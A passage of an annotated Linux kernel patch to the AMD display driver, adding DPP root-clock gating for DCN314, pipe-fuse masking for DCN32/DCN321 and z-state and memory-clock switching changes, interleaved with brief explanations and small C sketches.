+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 0);
+ 		DC_LOG_DEBUG(
+ 				"Power gated front end %d\n", hubp->inst);
+ 	}
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, dpp->inst, false);
+ }
+ 
+ /* disable HW used by plane.
+@@ -2464,7 +2472,7 @@ static void dcn10_enable_plane(
+ 
+ 	undo_DEGVIDCN10_253_wa(dc);
+ 
+-	power_on_plane(dc->hwseq,
++	power_on_plane_resources(dc->hwseq,
+ 		pipe_ctx->plane_res.hubp->inst);
+ 
+ 	/* enable DCFCLK current DCHUB */
+@@ -3383,7 +3391,9 @@ static bool dcn10_can_pipe_disable_cursor(struct pipe_ctx *pipe_ctx)
+ 	for (test_pipe = pipe_ctx->top_pipe; test_pipe;
+ 	     test_pipe = test_pipe->top_pipe) {
+ 		// Skip invisible layer and pipe-split plane on same layer
+-		if (!test_pipe->plane_state->visible || test_pipe->plane_state->layer_index == cur_layer)
++		if (!test_pipe->plane_state ||
++		    !test_pipe->plane_state->visible ||
++		    test_pipe->plane_state->layer_index == cur_layer)
+ 			continue;
+ 
+ 		r2 = test_pipe->plane_res.scl_data.recout;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 6291a241158ad..7e36ba4df89fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1110,11 +1110,15 @@ void dcn20_blank_pixel_data(
+ }
+ 
+ 
+-static void dcn20_power_on_plane(
++static void dcn20_power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	struct pipe_ctx *pipe_ctx)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, pipe_ctx->plane_res.dpp->inst, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1138,7 +1142,7 @@ static void dcn20_enable_plane(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	//if (dc->debug.sanity_checks) {
+ 	//	dcn10_verify_allow_pstate_change_high(dc);
+ 	//}
+-	dcn20_power_on_plane(dc->hwseq, pipe_ctx);
++	dcn20_power_on_plane_resources(dc->hwseq, pipe_ctx);
+ 
+ 	/* enable DCFCLK current DCHUB */
+ 	pipe_ctx->plane_res.hubp->funcs->hubp_clk_cntl(pipe_ctx->plane_res.hubp, true);
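
Both the DCN10 and DCN20 sequencers now route plane power-up through an optional dpp_root_clock_control hook, guarded by a NULL check so ASICs whose function tables lack the hook behave as before. A sketch of that optional-callback pattern (names illustrative):

/* Optional-hook sketch: the new callback is only invoked when the ASIC's
 * function table provides it, so generations without root-clock gating
 * are unaffected. */
#include <stdbool.h>
#include <stdio.h>

struct hwseq_funcs {
	void (*dpp_root_clock_control)(int dpp_inst, bool on); /* may be NULL */
};

static void power_on_plane_resources(const struct hwseq_funcs *f, int inst)
{
	if (f->dpp_root_clock_control)		/* optional per-ASIC hook */
		f->dpp_root_clock_control(inst, true);
	printf("plane %d powered on\n", inst);
}

static void dcn314_root_clock(int inst, bool on)
{
	printf("dpp%d root clock %s\n", inst, on ? "on" : "off");
}

int main(void)
{
	struct hwseq_funcs old_asic = { 0 };
	struct hwseq_funcs new_asic = { .dpp_root_clock_control = dcn314_root_clock };

	power_on_plane_resources(&old_asic, 0);	/* hook absent: skipped */
	power_on_plane_resources(&new_asic, 0);	/* hook present: gated */
	return 0;
}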
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7f34418e63081..7d2b982506fd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -66,17 +66,8 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ 		REG_UPDATE(DPPCLK_DTO_CTRL,
+ 				DPPCLK_DTO_ENABLE[dpp_inst], 1);
+ 	} else {
+-		//DTO must be enabled to generate a 0Hz clock output
+-		if (dccg->ctx->dc->debug.root_clock_optimization.bits.dpp) {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 1);
+-			REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
+-					DPPCLK0_DTO_PHASE, 0,
+-					DPPCLK0_DTO_MODULO, 1);
+-		} else {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 0);
+-		}
++		REG_UPDATE(DPPCLK_DTO_CTRL,
++				DPPCLK_DTO_ENABLE[dpp_inst], 0);
+ 	}
+ 	dccg->pipe_dppclk_khz[dpp_inst] = req_dppclk;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 0b769ee714058..081ce168f6211 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -289,8 +289,31 @@ static void dccg314_set_valid_pixel_rate(
+ 	dccg314_set_dtbclk_dto(dccg, &dto_params);
+ }
+ 
++static void dccg314_dpp_root_clock_control(
++		struct dccg *dccg,
++		unsigned int dpp_inst,
++		bool clock_on)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	if (clock_on) {
++		/* turn off the DTO and leave phase/modulo at max */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0xFF,
++			  DPPCLK0_DTO_MODULO, 0xFF);
++	} else {
++		/* turn on the DTO to generate a 0 Hz clock */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 1);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0,
++			  DPPCLK0_DTO_MODULO, 1);
++	}
++}
++
+ static const struct dccg_funcs dccg314_funcs = {
+ 	.update_dpp_dto = dccg31_update_dpp_dto,
++	.dpp_root_clock_control = dccg314_dpp_root_clock_control,
+ 	.get_dccg_ref_freq = dccg31_get_dccg_ref_freq,
+ 	.dccg_init = dccg31_init,
+ 	.set_dpstreamclk = dccg314_set_dpstreamclk,
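
dccg314_dpp_root_clock_control() gates the DPP root clock by programming the DTO: with the DTO enabled and phase 0 / modulo 1 the divider emits a 0 Hz clock, while disabling the DTO with phase = modulo = 0xFF leaves the clock at full rate. Assuming the output scales roughly as ref_clk * phase / modulo (the exact divider behavior is hardware-specific), the arithmetic looks like:

/* Assumed model of the DTO: output ~= ref_clk * phase / modulo; a zero
 * modulo stands in for "DTO disabled, clock passes through". */
#include <stdio.h>

static unsigned int dto_out_khz(unsigned int ref_khz,
				unsigned int phase, unsigned int modulo)
{
	if (!modulo)		/* DTO disabled: clock passes through */
		return ref_khz;
	return (unsigned int)((unsigned long long)ref_khz * phase / modulo);
}

int main(void)
{
	printf("gated (phase 0, modulo 1): %u kHz\n", dto_out_khz(600000, 0x00, 0x01));
	printf("full  (phase == modulo):   %u kHz\n", dto_out_khz(600000, 0xff, 0xff));
	return 0;
}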
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index 8e824dc81dede..414d7358a075f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -392,6 +392,16 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 				pix_per_cycle);
+ }
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on)
++{
++	if (!hws->ctx->dc->debug.root_clock_optimization.bits.dpp)
++		return;
++
++	if (hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control)
++		hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control(
++			hws->ctx->dc->res_pool->dccg, dpp_inst, clock_on);
++}
++
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
+ {
+ 	struct dc_context *ctx = hws->ctx;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index c419d3dbdfee6..c786d5e6a428e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -43,4 +43,6 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 25f345ff6c8f0..93de284e54653 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,6 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
++	.dpp_root_clock_control = dcn314_dpp_root_clock_control,
+ 	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9ffba4c6fe550..30129fb9c27a9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -887,6 +887,7 @@ static const struct dc_plane_cap plane_cap = {
+ static const struct dc_debug_options debug_defaults_drv = {
+ 	.disable_z10 = false,
+ 	.enable_z9_disable_interface = true,
++	.minimum_z8_residency_time = 2000,
+ 	.psr_skip_crtc_disable = true,
+ 	.disable_dmcu = true,
+ 	.force_abm_enable = false,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index 30d15a94f720d..578a715040ac3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -992,6 +992,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->ctx->dmub_srv) {
+ 		dc_dmub_srv_query_caps_cmd(dc->ctx->dmub_srv->dmub);
+ 		dc->caps.dmub_caps.psr = dc->ctx->dmub_srv->dmub->feature_caps.psr;
++		dc->caps.dmub_caps.mclk_sw = dc->ctx->dmub_srv->dmub->feature_caps.fw_assisted_mclk_switch;
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 6187aba1362b8..a473f10b53276 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2021,7 +2021,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	// In general cases we want to keep the dram clock change requirement
+ 	// (prefer configs that support MCLK switch). Only override to false
+ 	// for SubVP
+-	if (subvp_in_use)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching || subvp_in_use)
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = false;
+ 	else
+ 		context->bw_ctx.dml.soc.dram_clock_change_requirement_final = true;
+@@ -2077,6 +2077,14 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.restore_mall_state = dcn32_restore_mall_state,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN32 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn32_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -2119,7 +2127,7 @@ static bool dcn32_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn32;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
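
read_pipe_fuses() masks CC_DC_PIPE_DIS to the low four bits because DCN32 supports at most four pipes; stray high bits can no longer fuse off pipes that do not exist. A sketch of the masking and the pipe count it implies (register value illustrative):

/* Fuse-masking sketch: each set bit fuses off one pipe, and the register
 * is clamped to the pipes the ASIC can actually have. */
#include <stdio.h>

#define MAX_PIPES 4

static unsigned int read_pipe_fuses(unsigned int raw_reg)
{
	return raw_reg & 0xf;		/* ignore bits beyond MAX_PIPES */
}

int main(void)
{
	unsigned int fuses = read_pipe_fuses(0xf2); /* high garbage masked off */
	int i, pipes = 0;

	for (i = 0; i < MAX_PIPES; i++)
		if (!(fuses & (1u << i)))
			pipes++;		/* bit clear => pipe usable */
	printf("usable pipes: %d\n", pipes);	/* fuses=0x2 -> 3 pipes */
	return 0;
}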
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 1709b6edb89c9..bb36da5cc6c55 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1626,6 +1626,14 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.restore_mall_state = dcn32_restore_mall_state,
+ };
+ 
++static uint32_t read_pipe_fuses(struct dc_context *ctx)
++{
++	uint32_t value = REG_READ(CC_DC_PIPE_DIS);
++	/* DCN321 support max 4 pipes */
++	value = value & 0xf;
++	return value;
++}
++
+ 
+ static bool dcn321_resource_construct(
+ 	uint8_t num_virtual_links,
+@@ -1668,7 +1676,7 @@ static bool dcn321_resource_construct(
+ 	pool->base.res_cap = &res_cap_dcn321;
+ 	/* max number of pipes for ASIC before checking for pipe fuses */
+ 	num_pipes  = pool->base.res_cap->num_timing_generator;
+-	pipe_fuses = REG_READ(CC_DC_PIPE_DIS);
++	pipe_fuses = read_pipe_fuses(ctx);
+ 
+ 	for (i = 0; i < pool->base.res_cap->num_timing_generator; i++)
+ 		if (pipe_fuses & 1 << i)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index c26da3bb2892b..b6b8be74ee0ea 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -949,7 +949,6 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	int plane_count;
+ 	int i;
+ 	unsigned int optimized_min_dst_y_next_start_us;
+-	bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > 1000.0;
+ 
+ 	plane_count = 0;
+ 	optimized_min_dst_y_next_start_us = 0;
+@@ -974,6 +973,9 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 	else if (context->stream_count == 1 &&  context->streams[0]->signal == SIGNAL_TYPE_EDP) {
+ 		struct dc_link *link = context->streams[0]->sink->link;
+ 		struct dc_stream_status *stream_status = &context->stream_status[0];
++		int minimum_z8_residency = dc->debug.minimum_z8_residency_time > 0 ? dc->debug.minimum_z8_residency_time : 1000;
++		bool allow_z8 = context->bw_ctx.dml.vba.StutterPeriod > (double)minimum_z8_residency;
++		bool is_pwrseq0 = link->link_index == 0;
+ 
+ 		if (dc_extended_blank_supported(dc)) {
+ 			for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -986,18 +988,17 @@ static enum dcn_zstate_support_state  decide_zstate_support(struct dc *dc, struc
+ 				}
+ 			}
+ 		}
+-		/* zstate only supported on PWRSEQ0  and when there's <2 planes*/
+-		if (link->link_index != 0 || stream_status->plane_count > 1)
++
++		/* Don't support multi-plane configurations */
++		if (stream_status->plane_count > 1)
+ 			return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-		if (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000)
++		if (is_pwrseq0 && (context->bw_ctx.dml.vba.StutterPeriod > 5000.0 || optimized_min_dst_y_next_start_us > 5000))
+ 			return DCN_ZSTATE_SUPPORT_ALLOW;
+-		else if (link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
++		else if (is_pwrseq0 && link->psr_settings.psr_version == DC_PSR_VERSION_1 && !link->panel_config.psr.disable_psr)
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY : DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY;
+ 		else
+ 			return allow_z8 ? DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY : DCN_ZSTATE_SUPPORT_DISALLOW;
+-	} else if (allow_z8) {
+-		return DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY;
+ 	} else {
+ 		return DCN_ZSTATE_SUPPORT_DISALLOW;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index 4fa6363647937..fdfb19337ea6e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -368,7 +368,9 @@ void dcn30_fpu_update_soc_for_wm_a(struct dc *dc, struct dc_state *context)
+ 	dc_assert_fp_enabled();
+ 
+ 	if (dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].valid) {
+-		context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
++		if (!context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching ||
++				context->bw_ctx.dml.soc.dram_clock_change_latency_us == 0)
++			context->bw_ctx.dml.soc.dram_clock_change_latency_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.pstate_latency_us;
+ 		context->bw_ctx.dml.soc.sr_enter_plus_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_enter_plus_exit_time_us;
+ 		context->bw_ctx.dml.soc.sr_exit_time_us = dc->clk_mgr->bw_params->wm_table.nv_entries[WM_A].dml_input.sr_exit_time_us;
+ 	}
+@@ -520,6 +522,20 @@ void dcn30_fpu_calculate_wm_and_dlg(
+ 		pipe_idx++;
+ 	}
+ 
++	// WA: restrict FPO to use first non-strobe mode (NV24 BW issue)
++	if (context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching &&
++			dc->dml.soc.num_chans <= 4 &&
++			context->bw_ctx.dml.vba.DRAMSpeed <= 1700 &&
++			context->bw_ctx.dml.vba.DRAMSpeed >= 1500) {
++
++		for (i = 0; i < dc->dml.soc.num_states; i++) {
++			if (dc->dml.soc.clock_limits[i].dram_speed_mts > 1700) {
++				context->bw_ctx.dml.vba.DRAMSpeed = dc->dml.soc.clock_limits[i].dram_speed_mts;
++				break;
++			}
++		}
++	}
++
+ 	dcn20_calculate_dlg_params(dc, context, pipes, pipe_cnt, vlevel);
+ 
+ 	if (!pstate_en)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 6a1cf6adea77d..db06f3b9e637e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -149,8 +149,8 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_14_soc = {
+ 	.num_states = 5,
+ 	.sr_exit_time_us = 16.5,
+ 	.sr_enter_plus_exit_time_us = 18.5,
+-	.sr_exit_z8_time_us = 280.0,
+-	.sr_enter_plus_exit_z8_time_us = 350.0,
++	.sr_exit_z8_time_us = 268.0,
++	.sr_enter_plus_exit_z8_time_us = 393.0,
+ 	.writeback_latency_us = 12.0,
+ 	.dram_channel_width_bytes = 4,
+ 	.round_trip_ping_latency_dcfclk_cycles = 106,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 4b8f5fa0f0ad6..ec72b3c24b791 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -807,7 +807,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightY[k],
+ 					v->SwathHeightC[k],
+ 					TWait,
+-					v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ?
++					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3289,7 +3290,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index c8b28c83ddf48..e92eee2c664d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,6 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
++#define MIN_DCFCLK_FREQ_MHZ 200
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index b80cef70fa60f..383a409a3f54c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -106,16 +106,16 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.clock_limits = {
+ 		{
+ 			.state = 0,
+-			.dcfclk_mhz = 1564.0,
+-			.fabricclk_mhz = 400.0,
+-			.dispclk_mhz = 2150.0,
+-			.dppclk_mhz = 2150.0,
++			.dcfclk_mhz = 1434.0,
++			.fabricclk_mhz = 2250.0,
++			.dispclk_mhz = 1720.0,
++			.dppclk_mhz = 1720.0,
+ 			.phyclk_mhz = 810.0,
+ 			.phyclk_d18_mhz = 667.0,
+-			.phyclk_d32_mhz = 625.0,
++			.phyclk_d32_mhz = 313.0,
+ 			.socclk_mhz = 1200.0,
+-			.dscclk_mhz = 716.667,
+-			.dram_speed_mts = 1600.0,
++			.dscclk_mhz = 573.333,
++			.dram_speed_mts = 16000.0,
+ 			.dtbclk_mhz = 1564.0,
+ 		},
+ 	},
+@@ -125,14 +125,14 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.sr_exit_z8_time_us = 285.0,
+ 	.sr_enter_plus_exit_z8_time_us = 320,
+ 	.writeback_latency_us = 12.0,
+-	.round_trip_ping_latency_dcfclk_cycles = 263,
++	.round_trip_ping_latency_dcfclk_cycles = 207,
+ 	.urgent_latency_pixel_data_only_us = 4,
+ 	.urgent_latency_pixel_mixed_with_vm_data_us = 4,
+ 	.urgent_latency_vm_data_only_us = 4,
+-	.fclk_change_latency_us = 20,
+-	.usr_retraining_latency_us = 2,
+-	.smn_latency_us = 2,
+-	.mall_allocated_for_dcn_mbytes = 64,
++	.fclk_change_latency_us = 7,
++	.usr_retraining_latency_us = 0,
++	.smn_latency_us = 0,
++	.mall_allocated_for_dcn_mbytes = 32,
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ce006762f2571..ad6acd1b34e1d 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -148,18 +148,21 @@ struct dccg_funcs {
+ 		struct dccg *dccg,
+ 		int inst);
+ 
+-void (*set_pixel_rate_div)(
+-        struct dccg *dccg,
+-        uint32_t otg_inst,
+-        enum pixel_rate_div k1,
+-        enum pixel_rate_div k2);
+-
+-void (*set_valid_pixel_rate)(
+-        struct dccg *dccg,
+-	int ref_dtbclk_khz,
+-        int otg_inst,
+-        int pixclk_khz);
++	void (*set_pixel_rate_div)(struct dccg *dccg,
++			uint32_t otg_inst,
++			enum pixel_rate_div k1,
++			enum pixel_rate_div k2);
+ 
++	void (*set_valid_pixel_rate)(
++			struct dccg *dccg,
++			int ref_dtbclk_khz,
++			int otg_inst,
++			int pixclk_khz);
++
++	void (*dpp_root_clock_control)(
++			struct dccg *dccg,
++			unsigned int dpp_inst,
++			bool clock_on);
+ };
+ 
+ #endif //__DAL_DCCG_H__
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+index a4d61bb724b67..39bd53b790201 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw_sequencer_private.h
+@@ -115,6 +115,10 @@ struct hwseq_private_funcs {
+ 	void (*plane_atomic_disable)(struct dc *dc, struct pipe_ctx *pipe_ctx);
+ 	void (*enable_power_gating_plane)(struct dce_hwseq *hws,
+ 		bool enable);
++	void (*dpp_root_clock_control)(
++			struct dce_hwseq *hws,
++			unsigned int dpp_inst,
++			bool clock_on);
+ 	void (*dpp_pg_control)(struct dce_hwseq *hws,
+ 			unsigned int dpp_inst,
+ 			bool power_on);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+index a76da0131addd..9c20516be066c 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.c
+@@ -130,12 +130,13 @@ void dmub_dcn32_reset(struct dmub_srv *dmub)
+ 	REG_WRITE(DMCUB_INBOX1_WPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_RPTR, 0);
+ 	REG_WRITE(DMCUB_OUTBOX1_WPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_RPTR, 0);
++	REG_WRITE(DMCUB_OUTBOX0_WPTR, 0);
+ 	REG_WRITE(DMCUB_SCRATCH0, 0);
+ }
+ 
+ void dmub_dcn32_reset_release(struct dmub_srv *dmub)
+ {
+-	REG_WRITE(DMCUB_GPINT_DATAIN1, 0);
